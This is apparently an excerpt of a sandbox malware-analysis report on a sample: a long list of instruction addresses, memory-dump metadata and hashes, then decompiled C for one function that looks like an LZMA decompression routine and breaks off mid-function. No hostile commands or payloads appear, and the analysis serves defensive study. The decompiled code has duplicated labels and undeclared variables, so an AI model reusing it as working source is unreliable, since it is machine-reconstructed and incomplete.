                                                        0x0040685e
                                                        0x00406867
                                                        0x0040686d
                                                        0x0040686f
                                                        0x00406872
                                                        0x00000000
                                                        0x00406878
                                                        0x00406878
                                                        0x00000000
                                                        0x00406878
                                                        0x00000000
                                                        0x00406895
                                                        0x00406895
                                                        0x00406899
                                                        0x00407145
                                                        0x00000000
                                                        0x00407145
                                                        0x004068a2
                                                        0x004068b2
                                                        0x004068b5
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068bb
                                                        0x004068bb
                                                        0x004068bf
                                                        0x00000000
                                                        0x00000000
                                                        0x004068c1
                                                        0x004068c4
                                                        0x004068c7
                                                        0x004068f1
                                                        0x004068f7
                                                        0x004068fe
                                                        0x00000000
                                                        0x004068fe
                                                        0x004068c9
                                                        0x004068cd
                                                        0x004068d0
                                                        0x004068d5
                                                        0x004068d5
                                                        0x004068e0
                                                        0x004068e6
                                                        0x004068e8
                                                        0x004068eb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406930
                                                        0x00406936
                                                        0x00406939
                                                        0x00406946
                                                        0x0040694e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406905
                                                        0x00406905
                                                        0x00406909
                                                        0x00407154
                                                        0x00000000
                                                        0x00407154
                                                        0x00406915
                                                        0x00406920
                                                        0x00406920
                                                        0x00406920
                                                        0x00406923
                                                        0x00406926
                                                        0x00406929
                                                        0x0040692c
                                                        0x0040692e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fcb
                                                        0x00406fd1
                                                        0x00406fd4
                                                        0x00406fd7
                                                        0x00406ff1
                                                        0x00406ff4
                                                        0x00406ffa
                                                        0x00407005
                                                        0x00407005
                                                        0x00407007
                                                        0x00406fd9
                                                        0x00406fd9
                                                        0x00406fe8
                                                        0x00406fec
                                                        0x00406fec
                                                        0x0040700a
                                                        0x00407011
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00407013
                                                        0x00407013
                                                        0x00407017
                                                        0x004071c6
                                                        0x00000000
                                                        0x004071c6
                                                        0x00407023
                                                        0x0040702a
                                                        0x00407032
                                                        0x00407032
                                                        0x00407032
                                                        0x00407035
                                                        0x00407038
                                                        0x00407038
                                                        0x00000000
                                                        0x00000000
                                                        0x00406956
                                                        0x00406958
                                                        0x0040695b
                                                        0x004069cc
                                                        0x004069cf
                                                        0x004069d2
                                                        0x004069d9
                                                        0x004069e3
                                                        0x00000000
                                                        0x004069e3
                                                        0x0040695d
                                                        0x00406961
                                                        0x00406964
                                                        0x00406966
                                                        0x00406969
                                                        0x0040696c
                                                        0x0040696e
                                                        0x00406971
                                                        0x00406973
                                                        0x00406978
                                                        0x0040697b
                                                        0x0040697e
                                                        0x00406982
                                                        0x00406989
                                                        0x0040698c
                                                        0x00406993
                                                        0x00406997
                                                        0x0040699f
                                                        0x0040699f
                                                        0x0040699f
                                                        0x00406999
                                                        0x00406999
                                                        0x00406999
                                                        0x0040698e
                                                        0x0040698e
                                                        0x0040698e
                                                        0x004069a3
                                                        0x004069a6
                                                        0x004069c4
                                                        0x004069c6
                                                        0x00000000
                                                        0x004069c6
                                                        0x004069a8
                                                        0x004069ab
                                                        0x004069ae
                                                        0x004069b1
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b6
                                                        0x004069b9
                                                        0x004069bb
                                                        0x004069bc
                                                        0x004069bf
                                                        0x00000000
                                                        0x00000000
                                                        0x00406bf5
                                                        0x00406bf9
                                                        0x00406c17
                                                        0x00406c1a
                                                        0x00406c21
                                                        0x00406c24
                                                        0x00406c27
                                                        0x00406c2a
                                                        0x00406c2d
                                                        0x00406c30
                                                        0x00406c32
                                                        0x00406c39
                                                        0x00406c3a
                                                        0x00406c3c
                                                        0x00406c3f
                                                        0x00406c42
                                                        0x00406c45
                                                        0x00406c45
                                                        0x00406c4a
                                                        0x00000000
                                                        0x00406c4a
                                                        0x00406bfb
                                                        0x00406bfe
                                                        0x00406c01
                                                        0x00406c0b
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c5f
                                                        0x00406c63
                                                        0x00406c86
                                                        0x00406c89
                                                        0x00406c8c
                                                        0x00406c96
                                                        0x00406c65
                                                        0x00406c65
                                                        0x00406c68
                                                        0x00406c6b
                                                        0x00406c6e
                                                        0x00406c7b
                                                        0x00406c7e
                                                        0x00406c7e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ca2
                                                        0x00406ca6
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cac
                                                        0x00406cb0
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cb6
                                                        0x00406cb8
                                                        0x00406cbc
                                                        0x00406cbc
                                                        0x00406cbf
                                                        0x00406cc3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d13
                                                        0x00406d17
                                                        0x00406d1e
                                                        0x00406d21
                                                        0x00406d24
                                                        0x00406d2e
                                                        0x00000000
                                                        0x00406d2e
                                                        0x00406d19
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d3a
                                                        0x00406d3e
                                                        0x00406d45
                                                        0x00406d48
                                                        0x00406d4b
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d4e
                                                        0x00406d51
                                                        0x00406d54
                                                        0x00406d54
                                                        0x00406d57
                                                        0x00406d5a
                                                        0x00406d5d
                                                        0x00406d5d
                                                        0x00406d60
                                                        0x00406d67
                                                        0x00406d6c
                                                        0x00000000
                                                        0x00000000
                                                        0x00406dfa
                                                        0x00406dfa
                                                        0x00406dfe
                                                        0x0040719c
                                                        0x00000000
                                                        0x0040719c
                                                        0x00406e04
                                                        0x00406e07
                                                        0x00406e0a
                                                        0x00406e0e
                                                        0x00406e11
                                                        0x00406e17
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e1c
                                                        0x00406e1f
                                                        0x00000000
                                                        0x00000000
                                                        0x004069ef
                                                        0x004069ef
                                                        0x004069f3
                                                        0x00407160
                                                        0x00000000
                                                        0x00407160
                                                        0x004069f9
                                                        0x004069fc
                                                        0x004069ff
                                                        0x00406a03
                                                        0x00406a06
                                                        0x00406a0c
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a11
                                                        0x00406a14
                                                        0x00406a14
                                                        0x00406a17
                                                        0x00406a1a
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a20
                                                        0x00406a26
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a2c
                                                        0x00406a2c
                                                        0x00406a30
                                                        0x00406a33
                                                        0x00406a36
                                                        0x00406a39
                                                        0x00406a3c
                                                        0x00406a3d
                                                        0x00406a40
                                                        0x00406a42
                                                        0x00406a48
                                                        0x00406a4b
                                                        0x00406a4e
                                                        0x00406a51
                                                        0x00406a54
                                                        0x00406a57
                                                        0x00406a5a
                                                        0x00406a76
                                                        0x00406a79
                                                        0x00406a7c
                                                        0x00406a7f
                                                        0x00406a86
                                                        0x00406a8a
                                                        0x00406a8c
                                                        0x00406a90
                                                        0x00406a5c
                                                        0x00406a5c
                                                        0x00406a60
                                                        0x00406a68
                                                        0x00406a6d
                                                        0x00406a6f
                                                        0x00406a71
                                                        0x00406a71
                                                        0x00406a93
                                                        0x00406a9a
                                                        0x00406a9d
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa8
                                                        0x00406aa8
                                                        0x00406aac
                                                        0x0040716c
                                                        0x00000000
                                                        0x0040716c
                                                        0x00406ab2
                                                        0x00406ab5
                                                        0x00406ab8
                                                        0x00406abc
                                                        0x00406abf
                                                        0x00406ac5
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406aca
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406ad3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ad5
                                                        0x00406ad8
                                                        0x00406adb
                                                        0x00406ade
                                                        0x00406ae1
                                                        0x00406ae4
                                                        0x00406ae7
                                                        0x00406aea
                                                        0x00406aed
                                                        0x00406af0
                                                        0x00406af3
                                                        0x00406b0b
                                                        0x00406b0e
                                                        0x00406b11
                                                        0x00406b14
                                                        0x00406b14
                                                        0x00406b17
                                                        0x00406b1b
                                                        0x00406b1d
                                                        0x00406af5
                                                        0x00406af5
                                                        0x00406afd
                                                        0x00406b02
                                                        0x00406b04
                                                        0x00406b06
                                                        0x00406b06
                                                        0x00406b20
                                                        0x00406b27
                                                        0x00406b2a
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00406b2a
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b6c
                                                        0x00406b6c
                                                        0x00406b70
                                                        0x00407178
                                                        0x00000000
                                                        0x00407178
                                                        0x00406b76
                                                        0x00406b79
                                                        0x00406b7c
                                                        0x00406b80
                                                        0x00406b83
                                                        0x00406b89
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8e
                                                        0x00406b91
                                                        0x00406b91
                                                        0x00406b97
                                                        0x00406b35
                                                        0x00406b35
                                                        0x00406b38
                                                        0x00000000
                                                        0x00406b38
                                                        0x00406b99
                                                        0x00406b99
                                                        0x00406b9c
                                                        0x00406b9f
                                                        0x00406ba2
                                                        0x00406ba5
                                                        0x00406ba8
                                                        0x00406bab
                                                        0x00406bae
                                                        0x00406bb1
                                                        0x00406bb4
                                                        0x00406bb7
                                                        0x00406bcf
                                                        0x00406bd2
                                                        0x00406bd5
                                                        0x00406bd8
                                                        0x00406bd8
                                                        0x00406bdb
                                                        0x00406bdf
                                                        0x00406be1
                                                        0x00406bb9
                                                        0x00406bb9
                                                        0x00406bc1
                                                        0x00406bc6
                                                        0x00406bc8
                                                        0x00406bca
                                                        0x00406bca
                                                        0x00406be4
                                                        0x00406beb
                                                        0x00406bee
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406e7d
                                                        0x00406e7d
                                                        0x00406e81
                                                        0x004071a8
                                                        0x00000000
                                                        0x004071a8
                                                        0x00406e87
                                                        0x00406e8a
                                                        0x00406e8d
                                                        0x00406e91
                                                        0x00406e94
                                                        0x00406e9a
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c4d
                                                        0x00406c4d
                                                        0x00406c50
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f8c
                                                        0x00406f90
                                                        0x00406fb2
                                                        0x00406fb5
                                                        0x00406fbf
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00406f92
                                                        0x00406f95
                                                        0x00406f99
                                                        0x00406f9c
                                                        0x00406f9c
                                                        0x00406f9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00407049
                                                        0x0040704d
                                                        0x0040706b
                                                        0x0040706b
                                                        0x0040706b
                                                        0x00407072
                                                        0x00407079
                                                        0x00407080
                                                        0x00407080
                                                        0x00000000
                                                        0x00407080
                                                        0x0040704f
                                                        0x00407052
                                                        0x00407055
                                                        0x00407058
                                                        0x0040705f
                                                        0x00406fa3
                                                        0x00406fa3
                                                        0x00406fa6
                                                        0x00000000
                                                        0x00000000
                                                        0x0040713a
                                                        0x0040713d
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d74
                                                        0x00406d76
                                                        0x00406d7d
                                                        0x00406d7e
                                                        0x00406d80
                                                        0x00406d83
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d8b
                                                        0x00406d8e
                                                        0x00406d91
                                                        0x00406d93
                                                        0x00406d95
                                                        0x00406d95
                                                        0x00406d96
                                                        0x00406d99
                                                        0x00406da0
                                                        0x00406da3
                                                        0x00406db1
                                                        0x00000000
                                                        0x00000000
                                                        0x00407087
                                                        0x00407087
                                                        0x0040708a
                                                        0x00407091
                                                        0x00000000
                                                        0x00000000
                                                        0x00407096
                                                        0x00407096
                                                        0x0040709a
                                                        0x004071d2
                                                        0x00000000
                                                        0x004071d2
                                                        0x004070a0
                                                        0x004070a3
                                                        0x004070a6
                                                        0x004070aa
                                                        0x004070ad
                                                        0x004070b3
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b8
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070be
                                                        0x004070be
                                                        0x004070c2
                                                        0x00407122
                                                        0x00407125
                                                        0x0040712a
                                                        0x0040712b
                                                        0x0040712d
                                                        0x0040712f
                                                        0x00407132
                                                        0x0040703e
                                                        0x0040703e
                                                        0x00000000
                                                        0x0040703e
                                                        0x004070c4
                                                        0x004070ca
                                                        0x004070cd
                                                        0x004070d0
                                                        0x004070d3
                                                        0x004070d6
                                                        0x004070d9
                                                        0x004070dc
                                                        0x004070df
                                                        0x004070e2
                                                        0x004070e5
                                                        0x004070fe
                                                        0x00407101
                                                        0x00407104
                                                        0x00407107
                                                        0x0040710b
                                                        0x0040710d
                                                        0x0040710d
                                                        0x0040710e
                                                        0x00407111
                                                        0x004070e7
                                                        0x004070e7
                                                        0x004070ef
                                                        0x004070f4
                                                        0x004070f6
                                                        0x004070f9
                                                        0x004070f9
                                                        0x00407114
                                                        0x0040711b
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x00406db9
                                                        0x00406dbc
                                                        0x00406df2
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f25
                                                        0x00406f25
                                                        0x00406f28
                                                        0x00406f2a
                                                        0x004071b4
                                                        0x00000000
                                                        0x004071b4
                                                        0x00406f30
                                                        0x00406f33
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f39
                                                        0x00406f3d
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00000000
                                                        0x00406f40
                                                        0x00406dbe
                                                        0x00406dc0
                                                        0x00406dc2
                                                        0x00406dc4
                                                        0x00406dc7
                                                        0x00406dc8
                                                        0x00406dca
                                                        0x00406dcc
                                                        0x00406dcf
                                                        0x00406dd2
                                                        0x00406de8
                                                        0x00406ded
                                                        0x00406e25
                                                        0x00406e25
                                                        0x00406e29
                                                        0x00406e55
                                                        0x00406e57
                                                        0x00406e5e
                                                        0x00406e61
                                                        0x00406e64
                                                        0x00406e64
                                                        0x00406e69
                                                        0x00406e69
                                                        0x00406e6b
                                                        0x00406e6e
                                                        0x00406e75
                                                        0x00406e78
                                                        0x00406ea5
                                                        0x00406ea5
                                                        0x00406ea8
                                                        0x00406eab
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00000000
                                                        0x00406f1f
                                                        0x00406ead
                                                        0x00406eb3
                                                        0x00406eb6
                                                        0x00406eb9
                                                        0x00406ebc
                                                        0x00406ebf
                                                        0x00406ec2
                                                        0x00406ec5
                                                        0x00406ec8
                                                        0x00406ecb
                                                        0x00406ece
                                                        0x00406ee7
                                                        0x00406ee9
                                                        0x00406eec
                                                        0x00406eed
                                                        0x00406ef0
                                                        0x00406ef2
                                                        0x00406ef5
                                                        0x00406ef7
                                                        0x00406ef9
                                                        0x00406efc
                                                        0x00406efe
                                                        0x00406f01
                                                        0x00406f05
                                                        0x00406f07
                                                        0x00406f07
                                                        0x00406f08
                                                        0x00406f0b
                                                        0x00406f0e
                                                        0x00406ed0
                                                        0x00406ed0
                                                        0x00406ed8
                                                        0x00406edd
                                                        0x00406edf
                                                        0x00406ee2
                                                        0x00406ee2
                                                        0x00406f11
                                                        0x00406f18
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00406f18
                                                        0x00406e2b
                                                        0x00406e2e
                                                        0x00406e30
                                                        0x00406e33
                                                        0x00406e36
                                                        0x00406e39
                                                        0x00406e3b
                                                        0x00406e3e
                                                        0x00406e41
                                                        0x00406e41
                                                        0x00406e44
                                                        0x00406e44
                                                        0x00406e47
                                                        0x00406e4e
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00000000
                                                        0x00406e50
                                                        0x00000000
                                                        0x00406e50
                                                        0x00406e4e
                                                        0x00406dd4
                                                        0x00406dd7
                                                        0x00406dd9
                                                        0x00406ddc
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b3b
                                                        0x00406b3b
                                                        0x00406b3f
                                                        0x00407184
                                                        0x00000000
                                                        0x00407184
                                                        0x00406b45
                                                        0x00406b48
                                                        0x00406b4b
                                                        0x00406b4e
                                                        0x00406b51
                                                        0x00406b54
                                                        0x00406b57
                                                        0x00406b59
                                                        0x00406b5c
                                                        0x00406b5f
                                                        0x00406b62
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cc6
                                                        0x00406cc6
                                                        0x00406cca
                                                        0x00407190
                                                        0x00000000
                                                        0x00407190
                                                        0x00406cd0
                                                        0x00406cd3
                                                        0x00406cd6
                                                        0x00406cd9
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cde
                                                        0x00406ce1
                                                        0x00406ce4
                                                        0x00406ce7
                                                        0x00406cea
                                                        0x00406ced
                                                        0x00406cee
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf3
                                                        0x00406cf6
                                                        0x00406cf9
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cff
                                                        0x00406d01
                                                        0x00406d01
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f47
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f4d
                                                        0x00406f50
                                                        0x00406f53
                                                        0x00406f56
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f5b
                                                        0x00406f5e
                                                        0x00406f61
                                                        0x00406f64
                                                        0x00406f67
                                                        0x00406f6a
                                                        0x00406f6b
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f70
                                                        0x00406f73
                                                        0x00406f76
                                                        0x00406f79
                                                        0x00406f7c
                                                        0x00406f80
                                                        0x00406f82
                                                        0x00406f85
                                                        0x00000000
                                                        0x00406f87
                                                        0x00406d04
                                                        0x00406d04
                                                        0x00000000
                                                        0x00406d04
                                                        0x00406f85
                                                        0x004071ba
                                                        0x004071dc
                                                        0x004071e2
                                                        0x004071e4
                                                        0x004071eb
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x004071f1
                                                        0x004071f1
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                        • Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
                                                        • Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                        • Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406BF5 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 98%
                                                        			E00406BF5() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004071F9))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4)); // executed
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
